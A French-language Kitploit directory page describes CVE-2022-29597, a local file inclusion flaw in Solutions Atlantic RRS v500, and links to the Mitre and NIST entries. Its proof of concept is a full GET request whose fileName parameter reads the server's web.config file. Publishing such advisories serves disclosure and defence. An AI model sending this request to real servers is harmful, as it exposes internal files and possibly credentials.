Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-29597 — L'application RRS v500 est vulnérable à une inclusion locale de fichier (LFI). | Kitploit
Outils/GitHubGitHub/thegetch/cve-2022-29597
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubthegetch/cve-2022-29597

CVE-2022-29597

L'application RRS v500 est vulnérable à une inclusion locale de fichier (LFI).

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-29597 : Inclusion de fichier local dans RSS v500

L'application RRS v500 de Solutions Atlantic est vulnérable à une inclusion de fichier local (LFI). Tout utilisateur authentifié peut référencer des fichiers internes du système dans les requêtes envoyées à la page /RRSWeb/maint/ShowDocument/ShowDocument.aspx. Le serveur répondra avec succès en renvoyant le contenu du fichier interne demandé. Cette capacité pourrait permettre à des adversaires d'extraire des données sensibles et/ou des fichiers du système de fichiers sous-jacent, d'obtenir des connaissances sur le fonctionnement interne du système ou d'accéder au code source de l'application.

URL Mitre : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29597

URL NIST : https://nvd.nist.gov/vuln/detail/CVE-2022-29597

Preuve de concept (POC) :

Fonctionnalité d'affichage du document :

URL affectée :

  • /RRSWeb/maint/ShowDocument/ShowDocument.aspx

Lors de l'ouverture ou du téléchargement d'un PDF depuis le site RRS, une requête est envoyée à l'URL affectée qui inclut un paramètre fileName. Ce paramètre pourrait être modifié pour inclure un chemin interne du système, tel que web.config. Le serveur répondra alors avec le fichier demandé.

Requête GET avec un chemin interne vers web.config :

root@kitploit:~
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?fileName=C:\\Program%20Files\\Solutions%20Atlantic\\RRS\\RRSWeb\\web.config HTTP/1.1
Host: <REDACTED>
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<REDACTED>/RRSweb/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=<REDACTED>; ASP.NET_SessionId=<REDACTED>
Connection: Keep-Alive


Réponse du serveur :

RRS_LFI_web.config

Découverte

Avril 2022

  • Eric Getchell - TheGetch
Télécharger l’outil